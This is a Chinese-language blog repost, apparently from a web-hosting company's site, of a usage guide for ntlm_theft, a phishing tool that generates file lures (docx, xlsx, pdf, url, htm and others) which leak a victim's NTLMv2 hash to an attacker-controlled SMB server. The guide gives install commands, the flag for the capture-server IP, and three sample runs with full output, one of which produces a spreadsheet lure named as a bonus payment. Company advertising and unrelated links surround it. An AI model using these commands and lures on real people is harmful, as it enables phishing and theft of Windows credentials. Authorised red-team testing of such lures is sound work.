如何使用ntlm_theft生成各种类型的NTLMv2哈希窃取文件
关于ntlm_theft
ntlm_theft是一款基于Python 3开发的开源工具,可以生成21种不同类型的哈希窃取文档。该工具适用于网络钓鱼攻击,可以用于支持外网SMB流量和内部网络环境之中。与基于宏的文档或利用漏洞的文档相比,这些文件类型的好处在于,所有的这些文件都是使用“预期功能”构建的。
创新互联公司2013年成立,是专业互联网技术服务公司,拥有项目成都网站制作、网站设计网站策划,项目实施与项目整合能力。我们以让每一个梦想脱颖而出为使命,1280元西青做网站,已为上家服务,为西青各地企业和个人服务,联系电话:18982081108
使用场景
ntlm_theft主要针对渗透测试人员和红队研究人员设计,可以帮助研究人员对目标公司员工进行内部网络钓鱼,或大规模测试防病毒和电子邮件网关的安全性。如果外网防火墙上允许出站SMB访问,则它也可用于外部网络钓鱼。
工具依赖
ntlm_theft基于Python 3开发,因此我们需要在本地环境安装并配置好Python 3环境,并安装好xlsxwriter:
- pip3 install xlsxwriter
工具下载
广大研究人员可以使用下列命令将该项目源码克隆至本地:
- git clone https://github.com/Greenwolf/ntlm_theft.git
工具参数
ntlm_theft的运行需要提供四个必要参数,一个输入格式,输入文件或目录,以及基础的运行模式:
- -g, --generate : 选择生成所有文件或指定文件类型
- -s, --server : SMB哈希捕捉服务器的IP地址
- -f, --filename : 不包含后缀的基础文件名,之后可以进行重命名
工具运行
下面给出的工具演示样例中,我们将使用ntlm_theft生成所有文件:
- # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
- Created: test/test.scf (BROWSE)
- Created: test/test-(url).url (BROWSE)
- Created: test/test-(icon).url (BROWSE)
- Created: test/test.rtf (OPEN)
- Created: test/test-(stylesheet).xml (OPEN)
- Created: test/test-(fulldocx).xml (OPEN)
- Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
- Created: test/test-(includepicture).docx (OPEN)
- Created: test/test-(remotetempl*ate).docx (OPEN)
- Created: test/test-(frameset).docx (OPEN)
- Created: test/test.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY)
- Created: test/test.asx (OPEN)
- Created: test/test.jnlp (OPEN)
- Created: test/test.application (DOWNLOAD AND OPEN)
- Created: test/test.pdf (OPEN AND ALLOW)
- Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
- Generation Complete.
在下面的工具使用样例中,我们将使用ntlm_theft仅生成现代文件:
- # python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting
- Skipping SCF as it does not work on modern Windows
- Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
- Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)
- Created: meeting/meeting.rtf (OPEN)
- Created: meeting/meeting-(stylesheet).xml (OPEN)
- Created: meeting/meeting-(fulldocx).xml (OPEN)
- Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
- Created: meeting/meeting-(includepicture).docx (OPEN)
- Created: meeting/meeting-(remotetempl*ate).docx (OPEN)
- Created: meeting/meeting-(frameset).docx (OPEN)
- Created: meeting/meeting-(externalcell).xlsx (OPEN)
- Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY)
- Created: meeting/meeting.asx (OPEN)
- Created: meeting/meeting.jnlp (OPEN)
- Created: meeting/meeting.application (DOWNLOAD AND OPEN)
- Created: meeting/meeting.pdf (OPEN AND ALLOW)
- Skipping zoom as it does not work on the latest versions
- Skipping Autorun.inf as it does not work on modern Windows
- Skipping desktop.ini as it does not work on modern Windows
- Generation Complete.
在下面的工具使用样例中,我们将使用ntlm_theft仅生成一份xlsx文件:
- # python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4
- Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)
- Generation Complete.
工具运行截图
项目地址
ntlm_theft:【GitHub传送门】
网站题目:如何使用ntlm_theft生成各种类型的NTLMv2哈希窃取文件
网页路径:http://www.shufengxianlan.com/qtweb/news48/68348.html
网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联
- 快速压缩与解压:Linux下的Zip命令(ziplinux命令)
- Redis红锁超时引发的灾难(redis锁获取超时)
- hostwindsvps(如何使用SSH登录服务器?)
- 从 MySql 到 Redis,实现数据写入(写数据到redis)
- html用var报错
- 便宜vps香港
- 数据库清理:如何制定有效的策略?(数据库清理策略)
- Win8系统宽带连接自动连接如何设置?windows8开机自动宽带连接
- 对C++编程错误进行说明讲解
- 创新互联Python教程:csv—-CSV文件读写
- 免费ftp服务器怎么上传文件
- Linux下如何创建进程并使用线程?(linux进程创建线程)
- 宽带能降吗?(我想把服务器配置降下来再续费没法操作的吗)
- Ubuntu20.04LTS默认壁纸来了,镭射眼的猫
- 不需要备案的服务器如何选择